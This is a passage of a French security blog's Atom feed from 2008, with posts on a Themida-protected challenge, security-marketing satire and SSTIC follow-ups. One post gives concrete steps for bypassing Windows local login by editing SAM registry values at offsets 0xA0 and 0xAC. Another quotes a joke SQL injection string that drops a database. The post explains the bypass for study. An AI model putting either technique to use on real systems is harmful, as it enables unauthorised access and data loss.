adresse email (toujours faire simple avant de chercher compliqué ;) :&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;C:\&gt; strings -n 8 Challenge.DMP | findstr @ | more&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;(...)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Please, contact support@oreans.com. Thank you!&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;(...)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://oreans.com/"&gt;Oreans.com&lt;/a&gt; ... Les auteurs du packer &lt;a href="http://oreans.com/themida.php"&gt;Themida&lt;/a&gt; ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il suffit d'attacher KD et de consulter le DebugView pour s'en rendre compte:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Waiting to reconnect...&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Kernel Debugger connection established.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Symbol search path is: SRV*C:\WINDOWS\symbols*http://msdl.microsoft.com/download/symbols&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Executable search path is: &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Windows XP Kernel Version 2600 UP Free x86 compatible&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Built by: 2600.xpsp_sp2_rtm.040803-2158&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;System Uptime: not available&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;ERROR: DavReadRegistryValues/RegQueryValueExW(4). WStatus = 5&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;ERROR: DavReadRegistryValues/RegQueryValueExW(5). WStatus = 5&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;ERROR: DavReadRegistryValues/RegQueryValueExW(6). WStatus = 5&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;SYNC:DriverEntry.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;SYNC:DriverEntry - Done.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;%s------------------------------------------------&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;---          Themida Professional            ---&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;---      (c)2007 Oreans Technologies         ---&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;------------------------------------------------&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;watchdog!WdUpdateRecoveryState: Recovery enabled.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Et oui ! Cette année le challenge T2 consiste simplement à dumper un binaire protégé par Themida. Désolé les gars, mais si vous voulez une évaluation de votre protection &lt;span class="Apple-style-span" style="font-style: italic;"&gt;commerciale &lt;/span&gt;par des experts du domaine, je peux vous envoyer une propale ...&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7905702846776293714?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7905702846776293714/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7905702846776293714' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7905702846776293714'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7905702846776293714'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/09/bches-suite-ou-comment-finir-le.html' title='Bâches, suite (ou comment finir le challenge T2 en 2 minutes)'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7748180650450595398</id><published>2008-09-05T22:50:00.005+02:00</published><updated>2008-09-08T14:08:48.658+02:00</updated><title type='text'>Il pleut des bâches</title><content type='html'>Petit florilège du vendredi soir ...&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1. D'abord, l'une de mes banques en ligne.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il semble qu'elle prenne &lt;a href="http://www.espacesecurite.bnpparibas.com/fr/dossiers/?Code=IHAS-7H4D9J"&gt;très au sérieux&lt;/a&gt; le risque des &lt;span class="Apple-style-span" style="font-style: italic;"&gt;malwares&lt;/span&gt; sur téléphones portables. Je ne me risquerai pas à dire qu'il s'agit de pur &lt;a href="http://en.wikipedia.org/wiki/Fear,_uncertainty_and_doubt"&gt;FUD&lt;/a&gt;, n'ayant pas toutes les cartes en main (si quelqu'un a déjà vu un virus mobile "en vrai", qu'il me contacte !).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans tous les cas, l'article est rédigé dans un style tellement technique qu'il rebutera immédiatement la moindre ménagère de moins de 50 ans.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et surtout, avant qu'un téléphone soit suffisamment puissant pour pouvoir interpréter la page d'accueil de cette banque, il y a de la marge !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;2. Ensuite, &lt;a href="http://www.dartybox.com/espacesecurite/accueil.htm"&gt;ce site de vulgarisation&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour le coup, l'information est accessible au commun des mortels. Le graphisme est lêché, la mise en page est aérée, on sent qu'il y a du produit à vendre derrière (contrôle parental, antivirus, support sur site et tout le tremblement - on parle de &lt;a href="http://www.dartybox.com/espacesecurite/proteger_pack_securite.htm"&gt;pack 6-en-1 ici&lt;/a&gt; !).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le partenariat avec F-Secure est difficile à rater. D'ailleurs vous pouvez même &lt;a href="http://www.darty.com/dartybox/scanner/wwwroot/ols/start.html"&gt;installer leur ActiveX&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Au final, le chaland n'a rien compris, mais il s'est fait peur avec la &lt;a href="http://www.dartybox.com/espacesecurite/surveiller_virus.htm"&gt;carte de propagation en temps réel&lt;/a&gt; de &lt;span class="Apple-style-span" style="font-style: italic;"&gt;NSAnti.Packed&lt;/span&gt; ou &lt;span class="Apple-style-span" style="font-style: italic;"&gt;VB.Trojan-Downloader&lt;/span&gt;. Et si mon pâté de maison était dans la zone d'infection du virus ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;3. Les consultants certifiés CISSP&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bon là c'est certes un peu facile. Mais comme le faisait remarquer un ami (lui-même CISSP), le nouveau certifié prête serment sur la Bible de suivre le &lt;a href="https://www.isc2.org/cgi-bin/content.cgi?category=12"&gt;code d'éthique du CISSP&lt;/a&gt;. Les valeurs de ce code sont simples: d'abord la patrie, ensuite le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;business&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;D'ailleurs tout consultant CISSP a répondu lors de l'examen que s'il voyait son patron faire du P2P (et donc alimenter les caisses du terrorisme international en &lt;a href="http://www.news24.com/News24/Technology/News/0,,2-13-1443_1388359,00.html"&gt;2003&lt;/a&gt; comme en &lt;a href="http://www.informationweek.com/news/security/government/showArticle.jhtml?articleID=207000663"&gt;2008&lt;/a&gt;), il jouerait son rôle de &lt;span class="Apple-style-span" style="font-style: italic;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Whistleblower"&gt;whistleblower&lt;/a&gt;&lt;/span&gt; sans états d'âme.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vous l'aurez compris, c'est une certification américaine.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;4. Et pour finir, &lt;a href="http://hakin9.org/prt/view/actualites/issue/867.html"&gt;Hakin9&lt;/a&gt; est arrivé&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/hakin9_ssl.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/hakin9_ssl.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il n'y a pas grand'chose à ajouter, si ce n'est qu'un pilier de la sécurité informatique française m'a récemment recommandé d'écrire dans Hakin9. Et qu'on ne dit pas "&lt;a href="http://www.acklabs.net/blog/?p=552"&gt;crypter&lt;/a&gt;" en français.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7748180650450595398?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7748180650450595398/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7748180650450595398' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7748180650450595398'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7748180650450595398'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/09/il-pleut-des-bches.html' title='Il pleut des bâches'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1122864739500136272</id><published>2008-09-03T15:11:00.003+02:00</published><updated>2008-09-03T15:13:01.351+02:00</updated><title type='text'>Free fail</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/FreeFail.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/FreeFail.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Espérons que l'infâme &lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;' OR DROP DATABASE clients; --&lt;/span&gt;&lt;/span&gt; ne se soit pas abonné chez Free !&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1122864739500136272?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1122864739500136272/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1122864739500136272' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1122864739500136272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1122864739500136272'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/09/free-fail.html' title='Free fail'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7479493459468471111</id><published>2008-08-31T13:14:00.003+02:00</published><updated>2008-08-31T13:30:41.155+02:00</updated><title type='text'>C'est aujourd'hui ...</title><content type='html'>&lt;a href="http://www.blogday.org/"&gt;La journée mondiale du blog&lt;/a&gt; !&lt;br /&gt;&lt;br /&gt;Malheureusement, je n'ai pas eu le temps de beaucoup poster en août, compte-tenu de la charge de travail que représente le &lt;span style="font-style: italic;"&gt;coaching&lt;/span&gt; de &lt;a href="http://www.msuiche.net/"&gt;jeunes stagiaires&lt;/a&gt; &lt;a href="http://www.ivanlef0u.tuxfamily.org/"&gt;plein d'allant&lt;/a&gt;, et d'une activité professionnelle somme toute soutenue pour la saison.&lt;br /&gt;&lt;br /&gt;Notez que c'est un peu pareil pour &lt;a href="http://sid.rstack.org/blog/"&gt;Cédric&lt;/a&gt;, qui a déjà quelques conférences de retard dans ses compte-rendus.&lt;br /&gt;&lt;br /&gt;En parlant de conférences, il semble que &lt;span style="font-style: italic;"&gt;The Big One&lt;/span&gt; (comprenez la faille DNS de Kaminsky) a occulté une autre opération de communication pourtant assez rondement menée: le concours &lt;a href="http://www.racetozero.net/"&gt;&lt;span style="font-style: italic;"&gt;race to zero&lt;/span&gt;&lt;/a&gt;. Si vous avez complètement oublié de quoi il s'agit, et que vous n'avez pas pensé à aller voir les résultats, rassurez-vous: plusieurs équipes ont réussi à contourner tous les antivirus en quelques heures [&lt;a href="http://www.securityfocus.com/news/11531"&gt;1&lt;/a&gt;] [&lt;a href="http://www.securityfocus.com/brief/795"&gt;2&lt;/a&gt;].&lt;br /&gt;&lt;br /&gt;Le détail amusant, c'est que ce concours était sponsorisé par un &lt;a href="http://www.coretrace.com/products/"&gt;éditeur antivirus&lt;/a&gt; qui a pu &lt;a href="http://www.forbes.com/technology/2008/08/11/defcon-virus-contest-tech-security-cz_tb_0811defcon.html"&gt;se targuer&lt;/a&gt; de détecter tous les échantillons modifiés à l'aide de son produit. En effet, ce produit est basé sur le &lt;span style="font-style: italic;"&gt;whitelisting&lt;/span&gt; d'exécutables ...&lt;br /&gt;&lt;br /&gt;L'année prochaine, il n'y a qu'à organiser un concours &lt;span style="font-style: italic;"&gt;race to zero day&lt;/span&gt;, et voir comment se comporte le produit en question face à une exploitation de faille tout en mémoire, ou de faille noyau ...&lt;br /&gt;&lt;br /&gt;Décidément ces conférences américaines alimentent de plus en plus l'image &lt;a href="http://digg.com/linux_unix/Torvalds_Fed_up_with_the_security_circus"&gt;&lt;span style="font-style: italic;"&gt;Security Circus&lt;/span&gt;&lt;/a&gt; du métier !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7479493459468471111?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7479493459468471111/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7479493459468471111' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7479493459468471111'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7479493459468471111'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/08/cest-aujourdhui.html' title='C&apos;est aujourd&apos;hui ...'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5910115925611954344</id><published>2008-08-22T09:23:00.002+02:00</published><updated>2008-08-22T09:30:19.982+02:00</updated><title type='text'>Marketum Echecum</title><content type='html'>Vu dans la &lt;span style="font-style: italic;"&gt;newsletter&lt;/span&gt; des cinémas Pathé/Gaumont.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/lorem_ipsum1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/lorem_ipsum1.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Enfin ça fait 3 ans que &lt;a href="http://www.zerotracas.com/securite_routiere/fatigue_somnolence_volant._541.html"&gt;cette page&lt;/a&gt; est en ligne, donc de toute façon personne ne doit lire ces trucs là.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/lorem_ipsum2.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/lorem_ipsum2.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Message pour &lt;a href="http://www.acklabs.net/blog/"&gt;ceux qui pourraient se poser la question&lt;/a&gt;: c'est un passage des &lt;a href="http://la.wikisource.org/wiki/Metamorphoseon_-_Liber_X?match=fr"&gt;Métamorphoses&lt;/a&gt; d'Ovide.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5910115925611954344?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5910115925611954344/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5910115925611954344' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5910115925611954344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5910115925611954344'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/08/marketum-echecum.html' title='Marketum Echecum'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1626720523894139613</id><published>2008-08-06T16:35:00.001+02:00</published><updated>2008-08-07T10:56:12.447+02:00</updated><title type='text'>Réflexions post-SSTIC</title><content type='html'>&lt;span style="font-style: italic;"&gt;Mise à jour du 7 août : Damien Aumaitre &lt;/span&gt;&lt;span style="font-style: italic;"&gt;m'a contacté pour me dire que sa technique n'a rien de secrète. Du coup je publie la réponse complète :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Et oui le &lt;a href="http://www.sstic.org/SSTIC08/info.do"&gt;SSTIC 2008&lt;/a&gt;, à l'échelle numérique, ça semble déjà appartenir au paléolithique ...&lt;br /&gt;&lt;br /&gt;Mais voici deux questions issues de cette conférence auxquelles j'ai réfléchi par la suite:&lt;br /&gt;&lt;br /&gt;1. Concernant l'extension Firefox malicieuse présentée en Rump Session, et dont le code n'a pas été diffusé (à ma connaissance), je suis tombé &lt;a href="http://azurit.elbiahosting.sk/ffsniff/"&gt;là dessus&lt;/a&gt; par hasard en lisant le dernier Hackers News Magazine (&lt;span style="font-style: italic;"&gt;fear&lt;/span&gt;).&lt;br /&gt;&lt;br /&gt;2. Concernant la modification de la base de registre permettant de contourner l'authentification Windows, présentée pendant la conférence de &lt;a href="http://actes.sstic.org/SSTIC08/Voyage_Coeur_Memoire/"&gt;Damien Aumaitre&lt;/a&gt;, voici quelques explications.&lt;br /&gt;&lt;br /&gt;Tout d'abord il faut savoir sous Windows que les comptes locaux sont gérés dans la base SAM. Cette base est visible dans la base de registre, les clés qui nous intéressent étant:&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;HKLM\SECURITY\SAM\Domains\Account\Users\&lt;uid&gt;&lt;id&gt;&lt;/id&gt;&lt;/uid&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;(Ces clés ne sont visibles que pour le compte SYSTEM par défaut, il vous faudra changer les permissions pour y avoir accès).&lt;br /&gt;&lt;br /&gt;Ces clés contiennent deux valeurs binaires mystérieuses: F et V. En regardant &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;SAMSRV.DLL&lt;/span&gt;&lt;/span&gt; (avec les symboles de débogage), on se rend compte que ces clés sont nommées en interne &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;_SampFixedAttributeName&lt;/span&gt;&lt;/span&gt; et &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;_SampVariableAttributeName&lt;/span&gt;&lt;/span&gt;, ce qui est un peu plus explicite.&lt;br /&gt;&lt;br /&gt;Parmi les quelques fonctions qui référencent ces chaines, on trouve la fonction &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;CreateUser()&lt;/span&gt;&lt;/span&gt; qui permet de reconstituer l'essentiel de la structure de ces clés.&lt;br /&gt;&lt;br /&gt;La structure F est de la forme:&lt;br /&gt;&lt;span style=";font-family:courier new;font-size:85%;"  &gt;    ULONG version;&lt;br /&gt;   ULONG unk1;&lt;br /&gt;   time_t LastLogon;&lt;br /&gt;   time_t LastLogoff;&lt;br /&gt;   time_t LastPasswordSet;&lt;br /&gt;   time_t ExpirationDate;&lt;br /&gt;   time_t LastPasswordFailed;&lt;br /&gt;   ULONG uid;&lt;br /&gt;   ULONG gid;&lt;br /&gt;   ULONG options;&lt;br /&gt;   // différents compteurs (ex. login attempts) ?&lt;br /&gt;   USHORT unk2;&lt;br /&gt;   USHORT unk3;&lt;br /&gt;   [...]&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Rien d'intéressant a priori. La structure V est un peu plus complexe, puisque de taille variable. Elle commence par une liste de structures de type:&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;    ULONG offset;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    ULONG length;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    ULONG additional_data; // souvent zéro&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Puisque viennent les données proprement dites, comme le nom d'utilisateur, la description du compte, les hashes (chiffrés), etc.&lt;br /&gt;&lt;br /&gt;La manipulation de la SAM est effectuée par des API telles que &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;RtlAddAttributeActionToRXact()&lt;/span&gt;&lt;/span&gt;, &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;RtlAddActionToRXact()&lt;/span&gt;&lt;/span&gt;, &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;RtlApplyRXact()&lt;/span&gt;&lt;/span&gt;. Ces API garantissent que la modification de la base de registre, et donc la création du compte, s'effectuera de manière unitaire.&lt;br /&gt;&lt;br /&gt;Inutile d'aller plus loin dans l'analyse, puisque tout est documenté sur &lt;a href="http://www.beginningtoseethelight.org/ntsecurity/index.php"&gt;ce site&lt;/a&gt; (attention, la mise en page pique un peu les yeux* :). Voici les liens directs vers la clé &lt;a href="http://www.beginningtoseethelight.org/ntsecurity/index.php#8603CF0AFBB170DD"&gt;F&lt;/a&gt; et la clé &lt;a href="http://www.beginningtoseethelight.org/ntsecurity/index.php#D3BC3F5643A17823"&gt;V&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[*] Pas autant qu'un &lt;span style="font-style: italic;"&gt;post&lt;/span&gt; d'&lt;a href="http://www.ivanlef0u.tuxfamily.org/"&gt;Ivanlef0u&lt;/a&gt;, mais presque.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Dans mon souvenir, la manipulation consistait à remplacer un octet 0x14 par un octet 0x04 dans la clé V. Echec.&lt;br /&gt;&lt;br /&gt;En fait, l'auteur me signale qu'il faut remplacer les &lt;span style="font-style: italic;"&gt;deux&lt;/span&gt; valeurs aux offsets &lt;a href="http://www.beginningtoseethelight.org/ntsecurity/index.php#67BDBDE30F2A569E"&gt;0xA0 et 0xAC&lt;/a&gt;, ce qui a pour effet de dire au système que les &lt;span style="font-style: italic;"&gt;hashs&lt;/span&gt; LM et NTLM sont de longueur nulle. Et là, "ça marche chez moi" (Windows XP SP2 FR / Workgroup / Fast User Switching).&lt;br /&gt;&lt;br /&gt;PS. Je me demande bien à quoi sert la fonction &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;_SampFixBug18471()&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;PPS. Inutile de paniquer sur la présence d'une variable globale &lt;span style="font-size:85%;"&gt;&lt;span style="font-family: courier new;"&gt;_SampSecretEncryptionEnabled&lt;/span&gt;&lt;/span&gt;, c'est juste pour dire que SYSKEY est activé.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1626720523894139613?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1626720523894139613/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1626720523894139613' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1626720523894139613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1626720523894139613'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/08/rflexions-post-sstic.html' title='Réflexions post-SSTIC'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-961333891401064903</id><published>2008-08-05T20:01:00.003+02:00</published><updated>2008-08-05T20:05:51.129+02:00</updated><title type='text'>Marketing fail</title><content type='html'>Vu dans la &lt;span style="font-style: italic;"&gt;newsletter&lt;/span&gt; Nature &amp;amp; Découvertes:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/tarpe.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/tarpe.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Pour info, le Tarpé est &lt;a href="http://www.natureetdecouvertes.com/pages/gener/ficheProduit_view.asp?refart=52004910"&gt;une bâche&lt;/a&gt;, en fait.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;PS. Vous pouvez me trouver sur &lt;a href="http://twitter.com/newsoft"&gt;Twitter&lt;/a&gt; maintenant. Web 2.0 &lt;span style="font-style: italic;"&gt;forever&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;PPS. Promis je prépare des posts techniques et intéressants pour bientôt :)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-961333891401064903?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/961333891401064903/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=961333891401064903' title='2 commentaires'/><link rel='edit' type='application/atom+xml' 